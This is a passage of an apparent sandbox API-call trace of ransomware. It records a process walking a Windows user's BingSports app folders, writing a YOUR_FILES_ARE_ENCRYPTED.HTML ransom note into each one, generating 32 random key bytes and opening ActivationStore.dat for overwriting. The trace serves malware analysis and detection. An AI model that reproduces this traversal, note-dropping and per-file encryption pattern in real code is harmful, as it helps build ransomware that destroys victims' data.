lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.350] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData") returned 91 [0115.350] GetProcessHeap () returned 0x600000 [0115.350] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.350] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData" [0115.350] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData\\*" [0115.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2714f314, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2714f314, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.351] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2714f314, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2714f314, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.351] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2714f314, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2714f314, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 0 [0115.351] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.351] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.351] GetProcessHeap () returned 0x600000 [0115.351] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.352] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.353] CloseHandle (hObject=0x214) returned 1 [0115.353] GetProcessHeap () returned 0x600000 [0115.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.353] GetProcessHeap () returned 0x600000 [0115.353] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.354] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.354] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.354] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache") returned 94 [0115.354] GetProcessHeap () returned 0x600000 [0115.354] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.355] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache" [0115.355] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache\\*" [0115.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.357] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.357] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 0 [0115.357] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.357] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.357] GetProcessHeap () returned 0x600000 [0115.357] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.359] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.363] CloseHandle (hObject=0x214) returned 1 [0115.363] GetProcessHeap () returned 0x600000 [0115.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.363] GetProcessHeap () returned 0x600000 [0115.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.364] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f19b08, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f19b08, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f19b08, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.364] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.364] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState") returned 94 [0115.364] GetProcessHeap () returned 0x600000 [0115.364] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.365] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState" [0115.365] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState\\*" [0115.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f19b08, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f19b08, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f19b08, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.366] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f19b08, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f19b08, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f19b08, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.366] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f19b08, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f19b08, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f19b08, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 0 [0115.366] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.366] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.366] GetProcessHeap () returned 0x600000 [0115.366] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.368] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.369] CloseHandle (hObject=0x214) returned 1 [0115.369] GetProcessHeap () returned 0x600000 [0115.369] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.369] GetProcessHeap () returned 0x600000 [0115.369] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.369] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0115.369] StrStrIW (lpFirst="Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.369] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe") returned 133 [0115.369] GetProcessHeap () returned 0x600000 [0115.369] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.370] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe" [0115.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\*" [0115.370] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.370] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x29fd18d6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.370] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a2120ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.370] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.370] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned 149 [0115.370] GetProcessHeap () returned 0x600000 [0115.370] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.372] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" [0115.372] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*" [0115.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a2120ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187ad0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.375] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a2120ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187ad0, cFileName="..", cAlternateFileName="")) returned 1 [0115.375] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a803aaf, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a803aaf, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x311bec0, dwReserved1=0x3187ad0, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.375] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.375] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 169 [0115.375] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.375] lstrlenW (lpString=".dat") returned 4 [0115.375] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.375] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0115.376] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0115.376] GetProcessHeap () returned 0x600000 [0115.376] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0115.379] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="81") returned 2 [0115.379] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="6A") returned 2 [0115.379] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="F4") returned 2 [0115.379] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="97") returned 2 [0115.379] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="B0") returned 2 [0115.379] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="FF") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="B2") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="4A") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="F1") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="33") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="B0") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="2D") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="E1") returned 2 [0115.380] wsprintfW (in: 